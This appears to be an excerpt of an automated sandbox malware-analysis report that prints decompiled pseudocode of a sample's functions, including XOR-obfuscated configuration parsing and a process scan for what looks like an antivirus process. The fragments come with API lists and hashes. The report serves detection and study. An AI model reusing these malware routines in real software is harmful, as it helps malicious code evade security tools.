Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: ff82da880f16408976baddc1e0edd64682ebb0585b6051a486b11082e0960fa9
Instruction ID: ad905770fa3811becb1d7a20daa5a0c39e30622a7d1ad069632c846926bfea80
Opcode Fuzzy Hash: ff82da880f16408976baddc1e0edd64682ebb0585b6051a486b11082e0960fa9
Instruction Fuzzy Hash: 7BF05437A00145BAEB11D7998D41FAF77FDDBC5664F650059A904E3140EE70DA018B78

Uniqueness

Uniqueness Score: -1.00%

Function 02A74ECA, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x2a7d23c) == 0) {
						E02A71B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x2a7d23c) == 1) {
						_t10 = E02A712E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x02a74ed1
0x02a74ed2
0x02a74ed5
0x02a74f07
0x02a74f09
0x02a74f09
0x02a74ed7
0x02a74ed8
0x02a74eed
0x02a74ef4
0x02a74ef6
0x02a74ef6
0x02a74ef4
0x02a74ed8
0x02a74f11

APIs

InterlockedIncrement.KERNEL32(02A7D23C), ref: 02A74EDF

Part of subcall function 02A712E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,02A74EF2,?), ref: 02A712F8

InterlockedDecrement.KERNEL32(02A7D23C), ref: 02A74EFF

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: b6a9f947d17a306527effcbe61d5489c581c5dae93a0d2911f7074f712ef6f67
Instruction ID: a03ef5d1149deff3285abb2dd7f37096ff90f17a3c18165932baea75715fa766
Opcode Fuzzy Hash: b6a9f947d17a306527effcbe61d5489c581c5dae93a0d2911f7074f712ef6f67
Instruction Fuzzy Hash: 86E04F3128813963A7211BB49E88B5AEA77AF98F94F014416E486D1030DF20CC529ADD

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEAC30, Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEAC37
std::ios_base::getloc.LIBCPMTD ref: 6DDEAC40

Part of subcall function 6DDE88A0: std::locale::locale.LIBCPMTD ref: 6DDE88BA

Part of subcall function 6DDE3020: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE304A
Part of subcall function 6DDE3020: int.LIBCPMTD ref: 6DDE3063

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: H_prolog3LockitLockit::_std::_std::ios_base::getlocstd::locale::locale
String ID:
API String ID: 2499403736-0
Opcode ID: 5c2e3c01f9b5aa86cef6116ec7cdcbb418d280e044eac7929e9f433f60bb00ca
Instruction ID: 5135a5d991eda5117627d9526c9269f115df8160320fc1e02a97553d84a49c46
Opcode Fuzzy Hash: 5c2e3c01f9b5aa86cef6116ec7cdcbb418d280e044eac7929e9f433f60bb00ca
Instruction Fuzzy Hash: EFE04F719042059BCB14FBB4CC08AAEBB74BF947A5F214564B751571D4CF348A00C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF2A8A, Relevance: 3.0, APIs: 2, Instructions: 16COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,?,6DDFE723,?,00000055,0000009C), ref: 6DDF2AA4
___crtDownlevelLCIDToLocaleName.LIBCMT ref: 6DDF2AAB

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: DefaultDownlevelLocaleNameUser___crt
String ID:
API String ID: 395733334-0
Opcode ID: 3ac6d5bc5e1b118b1e8e2fe06995786d7f0cfd7e84e9a580b21b37c0b6362049
Instruction ID: 92fd25989e16957fb5a7ad120d454dbb636af32a7b5fbe4d08d0af759428a762
Opcode Fuzzy Hash: 3ac6d5bc5e1b118b1e8e2fe06995786d7f0cfd7e84e9a580b21b37c0b6362049
Instruction Fuzzy Hash: 70D09E72404109AFCF116BE4AC0592A3BA8AF5D6147454405F51C85511D736A164DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A748F1, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02A748F1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2a7d2a8; // 0x229a5a8
				_t4 = _t15 + 0x2a7e39c; // 0x4d18944
				_t20 = _t4;
				_t6 = _t15 + 0x2a7e124; // 0x650047
				_t17 = E02A7219B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02A72298(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02a748fb
0x02a74902
0x02a74903
0x02a74904
0x02a74905
0x02a7490b
0x02a74910
0x02a74910
0x02a7491a
0x02a7492c
0x02a74933
0x02a74961
0x02a74935
0x02a74937
0x02a7493c
0x02a7495e
0x02a7493e
0x02a74941
0x02a74948
0x02a7494d
0x02a7494f
0x02a7494f
0x02a74954
0x02a74954
0x02a7493c
0x02a74968

APIs

Part of subcall function 02A7219B: SysFreeString.OLEAUT32(?), ref: 02A7227A

Part of subcall function 02A72298: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02A784CA,004F0053,00000000,?), ref: 02A722A1
Part of subcall function 02A72298: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02A784CA,004F0053,00000000,?), ref: 02A722CB
Part of subcall function 02A72298: memset.NTDLL ref: 02A722DF

SysFreeString.OLEAUT32(00000000), ref: 02A74954

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: ef6fba9d944abaeb649ff2ebff4ad5a7d5dc25a775852dd6e26232c0bf9e14a2
Instruction ID: 7b02b09e67c7bbafab0dc1a2c3292e79ae68d1f51011d8e274bb32411d284fa9
Opcode Fuzzy Hash: ef6fba9d944abaeb649ff2ebff4ad5a7d5dc25a775852dd6e26232c0bf9e14a2
Instruction Fuzzy Hash: 11019E32540019BFEB119BA4CD40AAABBB9FB48350F004465E954A7060DB70D915CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 02A7A71F, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A7A71F(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x2a7d238, 0, _a4); // executed
				return _t2;
			}

0x02a7a72b
0x02a7a731

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d3b87a0b9f21f22d28c7917809e37b950f4b081063ffd5544bd5a04836747255
Instruction ID: d5d99aae27bd385a9db07aa18fc910ec812ce19e0f7e1e6a35736a77bab215c2
Opcode Fuzzy Hash: d3b87a0b9f21f22d28c7917809e37b950f4b081063ffd5544bd5a04836747255
Instruction Fuzzy Hash: 04B01231880100BBCA014B00DD08F05FB22FF60700F014911B205440708F31C4BBEB4C

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E283, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6DE1DD28), ref: 6DE1E395

Memory Dump Source

Source File: 00000003.00000002.500853158.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 90650e3c6c7673b7d2fcf8755899109705f0d26dd55bdfef729c9fccd514bc0c
Instruction ID: 9ea18e71ab9e6e71e7df9985d00391ae7adfbd7408206eeca678bfb2c84a1c5e
Opcode Fuzzy Hash: 90650e3c6c7673b7d2fcf8755899109705f0d26dd55bdfef729c9fccd514bc0c
Instruction Fuzzy Hash: 4B41D03220E7818FC7139F248CA46A5BF70AF46704B1D04CAE895EF6A7DAA42805D732

Uniqueness

Uniqueness Score: -1.00%

Function 02A75356, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A75356(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02A78BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2a7d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02A748F1(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02a75356
0x02a7535e
0x02a75375
0x02a75390
0x02a75394
0x02a75399
0x02a7539b
0x02a753ad
0x02a753b9
0x02a7539d
0x02a7539d
0x02a753a2
0x02a753a7
0x02a753a7
0x02a7539b
0x02a753bf
0x02a753c3
0x02a753c3
0x02a7536a
0x02a7536f
0x02a75373
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02A748F1: SysFreeString.OLEAUT32(00000000), ref: 02A74954

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,02A78D51,?,004F0053,04D19368,00000000,?), ref: 02A753B9

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 9b9cdcfc5a0ee7ca632b5dfcb3f439b298edcd13f3fbf6cd443c88c2039d2d62
Instruction ID: 42acdb38c653209e3dae177ece34cb029ac4a5cf887fd4620a121f150bc926f6
Opcode Fuzzy Hash: 9b9cdcfc5a0ee7ca632b5dfcb3f439b298edcd13f3fbf6cd443c88c2039d2d62
Instruction Fuzzy Hash: D4018B32900619BBCB229F54CC50EEE7B66EF48790F448428FE059A130DB70C921DBC4

Uniqueness

Uniqueness Score: -1.00%

Function 02A71AE2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02A71AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x02a71ae2
0x02a71aef
0x02a71af0
0x02a71af1
0x02a71af8
0x02a71b26
0x02a71b27
0x02a71b2a
0x02a71b30
0x00000000
0x00000000
0x02a71b0f
0x02a71b19
0x02a71b20
0x00000000
0x02a71b11
0x02a71b14
0x02a71b34
0x02a71b16
0x02a71b16
0x00000000
0x02a71b16
0x02a71b14
0x02a71b3b
0x02a71b41
0x02a71b41
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 02A71B2A

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4dff2988176ad116b990064ae0d348fc5ed84253e7c718318a1599c58bbf897a
Instruction ID: 576385b3ea379028211dac548ad57575b2b147fa2f90c6d76da90946ab98409e
Opcode Fuzzy Hash: 4dff2988176ad116b990064ae0d348fc5ed84253e7c718318a1599c58bbf897a
Instruction Fuzzy Hash: 58F0FF75D01218EFDB00DBD8C988AEDB7F8EF44305F1084AAE60663140EB745B45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 02A74A09, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A74A09(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E02A71526(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E02A7A734(_a4);
				}
				return _t12;
			}

0x02a74a15
0x02a74a1a
0x02a74a1e
0x02a74a25
0x02a74a30
0x02a74a34
0x02a74a34
0x02a74a3d

APIs

Part of subcall function 02A71526: memcpy.NTDLL(00000000,00000090,00000002,00000002,02A75289,00000008,02A75289,02A75289,?,02A7A3FE,02A75289), ref: 02A7155C
Part of subcall function 02A71526: memset.NTDLL ref: 02A715D1
Part of subcall function 02A71526: memset.NTDLL ref: 02A715E5

memcpy.NTDLL(00000002,02A75289,00000000,00000002,02A75289,02A75289,02A75289,?,02A7A3FE,02A75289,?,02A75289,00000002,?,?,02A75D5E), ref: 02A74A25

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction ID: cd9081a2c7ee450531a47dd3256eb76b3e33c19faee1b43d080af1a2171591c5
Opcode Fuzzy Hash: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction Fuzzy Hash: C4E0C277401228B7CB126B94DC00EEFBF6DCF56BA1F004020FE089A200EB35C610ABE9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02A7888E, Relevance: 10.7, APIs: 7, Instructions: 237
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E02A7888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x2a7d2a4; // 0x63699bc3
				if(E02A77145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x2a7d2d8 = _v8;
				}
				_t31 =  *0x2a7d2a4; // 0x63699bc3
				if(E02A77145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x2a7d2a4; // 0x63699bc3
				if(E02A77145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x2a7d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x2a7d2a4; // 0x63699bc3
						_t43 = E02A76B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x2a7d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x2a7d2a4; // 0x63699bc3
						_t44 = E02A76B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x2a7d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x2a7d2a4; // 0x63699bc3
						_t45 = E02A76B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x2a7d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x2a7d2a4; // 0x63699bc3
						_t46 = E02A76B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x2a7d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x2a7d2a4; // 0x63699bc3
						_t47 = E02A76B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x2a7d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x2a7d2a4; // 0x63699bc3
						_t48 = E02A76B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E02A756FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E02A76702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x2a7d2a4; // 0x63699bc3
						_t49 = E02A76B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E02A756FA(0, _t49) != 0) {
						_t114 =  *0x2a7d32c; // 0x4d195b0
						E02A723F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x2a7d2a4; // 0x63699bc3
						_t50 = E02A76B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x2a7d2a8; // 0x229a5a8
						_t20 = _t51 + 0x2a7e252; // 0x616d692f
						 *0x2a7d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E02A756FA(0, _t50);
						 *0x2a7d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x2a7d2a4; // 0x63699bc3
								_t53 = E02A76B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x2a7d2a8; // 0x229a5a8
								_t21 = _t54 + 0x2a7e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E02A756FA(0, _t53);
							}
							 *0x2a7d340 = _t55;
							HeapFree( *0x2a7d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}

0x02a7888e
0x02a78891
0x02a788b1
0x02a788bf
0x02a788bf
0x02a788c4
0x02a788de
0x02a78b0d
0x02a78b14
0x02a78b1b
0x02a78b1b
0x02a788e4
0x02a78900
0x02a78afb
0x02a78b05
0x00000000
0x02a78906
0x02a78906
0x02a7890b
0x02a78921
0x02a7890d
0x02a7890d
0x02a7891a
0x02a7891a
0x02a7892b
0x02a7892d
0x02a78937
0x02a7893c
0x02a7893c
0x02a78937
0x02a78943
0x02a78959
0x02a78945
0x02a78945
0x02a78952
0x02a78952
0x02a7895d
0x02a7895f
0x02a78969
0x02a7896e
0x02a7896e
0x02a78969
0x02a78975
0x02a7898b
0x02a78977
0x02a78977
0x02a78984
0x02a78984
0x02a7898f
0x02a78991
0x02a7899b
0x02a789a0
0x02a789a0
0x02a7899b
0x02a789a7
0x02a789bd
0x02a789a9
0x02a789a9
0x02a789b6
0x02a789b6
0x02a789c1
0x02a789c3
0x02a789cd
0x02a789d2
0x02a789d2
0x02a789cd
0x02a789d9
0x02a789ef
0x02a789db
0x02a789db
0x02a789e8
0x02a789e8
0x02a789f3
0x02a789f5
0x02a789ff
0x02a78a04
0x02a78a04
0x02a789ff
0x02a78a0b
0x02a78a21
0x02a78a0d
0x02a78a0d
0x02a78a1a
0x02a78a1a
0x02a78a25
0x02a78a27
0x02a78a2a
0x02a78a2b
0x02a78a32
0x02a78a34
0x02a78a35
0x02a78a35
0x02a78a32
0x02a78a3c
0x02a78a52
0x02a78a3e
0x02a78a3e
0x02a78a4b
0x02a78a4b
0x02a78a56
0x02a78a64
0x02a78a6e
0x02a78a6e
0x02a78a75
0x02a78a8b
0x02a78a77
0x02a78a77
0x02a78a84
0x02a78a84
0x02a78a8f
0x02a78aa2
0x02a78aa2
0x02a78aa7
0x02a78aad
0x00000000
0x02a78a91
0x02a78a94
0x02a78a99
0x02a78aa0
0x02a78ab2
0x02a78ab4
0x02a78aca
0x02a78ab6
0x02a78ab6
0x02a78ac3
0x02a78ac3
0x02a78ace
0x02a78ada
0x02a78adf
0x02a78adf
0x02a78ad0
0x02a78ad3
0x02a78ad3
0x02a78aed
0x02a78af2
0x02a78af8
0x00000000
0x02a78af8
0x00000000
0x02a78aa0
0x02a78a8f

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008), ref: 02A78933
StrToIntExA.SHLWAPI(00000000,00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008), ref: 02A78965
StrToIntExA.SHLWAPI(00000000,00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008), ref: 02A78997
StrToIntExA.SHLWAPI(00000000,00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008), ref: 02A789C9
StrToIntExA.SHLWAPI(00000000,00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008), ref: 02A789FB
HeapFree.KERNEL32(00000000,02A75D25,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008,?,02A75D25), ref: 02A78AF2
HeapFree.KERNEL32(00000000,?,02A75D25,?,63699BC3,?,02A75D25,63699BC3,?,02A75D25,63699BC3,00000005,02A7D00C,00000008,?,02A75D25), ref: 02A78B05

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 74dacc59136fc55b8f15362e5ca54306584686987fae46351b3f5a6a2eca7d25
Instruction ID: b4c153dbae426d24ad629ecdad8a4083bbd3702395b8c527d413c583e1c53961
Opcode Fuzzy Hash: 74dacc59136fc55b8f15362e5ca54306584686987fae46351b3f5a6a2eca7d25
Instruction Fuzzy Hash: 29717C71E40505AEC710EBB98ECC95BBBEE9F987007290D21A502DB104EF38D95B9B6C

Uniqueness

Uniqueness Score: -1.00%

Function 6DDFF2E7, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6DDFF2FE
_wcscmp.LIBCMT ref: 6DDFF30F
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6DDFF5AD,?,00000000), ref: 6DDFF32B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6DDFF5AD,?,00000000), ref: 6DDFF355

Strings

OCP, xrefs: 6DDFF309
ACP, xrefs: 6DDFF2F8

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 062f0ef13a9abf017221d8232374fb4bfd06f2d21ddaeefeb93d36a63c812c79
Instruction ID: 0fa1071696c72ea619910b506d118376557021c75430154f90f63f0ff9fde1a0
Opcode Fuzzy Hash: 062f0ef13a9abf017221d8232374fb4bfd06f2d21ddaeefeb93d36a63c812c79
Instruction Fuzzy Hash: 62019632205116FAD701BF28CC80FDA37ECAF05765B078065FA08DA152EB31D686C794

Uniqueness

Uniqueness Score: -1.00%

Function 02A7A65C, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02A7A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2a7d2a8; // 0x229a5a8
						_t2 = _t9 + 0x2a7ee34; // 0x73617661
						_push( &_v264);
						if( *0x2a7d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02a7a667
0x02a7a671
0x02a7a675
0x02a7a67f
0x02a7a6b0
0x02a7a686
0x02a7a68b
0x02a7a698
0x02a7a6a1
0x02a7a6b8
0x02a7a6a3
0x02a7a6ab
0x00000000
0x02a7a6ab
0x02a7a6b9
0x02a7a6ba
0x00000000
0x02a7a6ba
0x00000000
0x02a7a6b4
0x02a7a6c0
0x02a7a6c5

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02A7A66C
Process32First.KERNEL32(00000000,?), ref: 02A7A67F
